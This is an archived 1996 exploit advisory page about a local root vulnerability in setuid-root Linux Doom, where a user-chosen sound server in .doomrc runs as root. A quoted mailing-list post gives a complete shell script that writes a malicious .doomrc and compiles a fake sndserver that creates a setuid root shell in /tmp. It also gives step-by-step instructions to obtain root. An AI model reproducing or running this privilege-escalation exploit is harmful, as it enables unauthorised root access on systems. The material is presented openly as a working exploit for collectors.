Linux Doom sndserver vulnerability

Summary
Description:This one is pathetic. The user can configure a soundserver in .doomrc, and this program that the user chose, runs as root!
Author:Joe Zbiciak <im14u2c@cegt201.bradley.edu>
Compromise: root (local)
Vulnerable Systems:Linux running an insecure version of doom setuid root.
Date:17 December 1996
Details

From: Bo (bo@ebony.iaehv.nl)
To: Tue, 17 Dec 1996 10:18:24 +0100 

> From: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
> Subject:      Re: Linux: exploit for killmouse.
>
> Which reminds me, there's a bigger hole in Doom.  It doesn't drop its
> root permissions soon enough!  The user is allowed to set a sound server
> in his/her .doomrc.  Normally, this is set to "sndserver".  Howver, this
> can be set to *any* program, and that program runs as root!!

Yes,  very true. And just in case anybody collects these scripts, here's
the obvious one:

#!/bin/sh
# Tue Dec 17 10:02:20 MET 1996 Bo
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include <stdio.h>
#include <unistd.h>
main() {
        if (fork()) while (getc(stdin));
        else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                /* or whatever you like to do */
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver

The  fork()  is  just so that doom runs on nicely without locking up the
keyboard  and  sndserver  gobbles  up all the sound data send to it. Run
the script, start sdoom, quit the normal way, and execute /tmp/sh.

Thanks for pointing it out, Joe.

Regards,
                Bo.

--
                "Heisenberg may have been here".

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault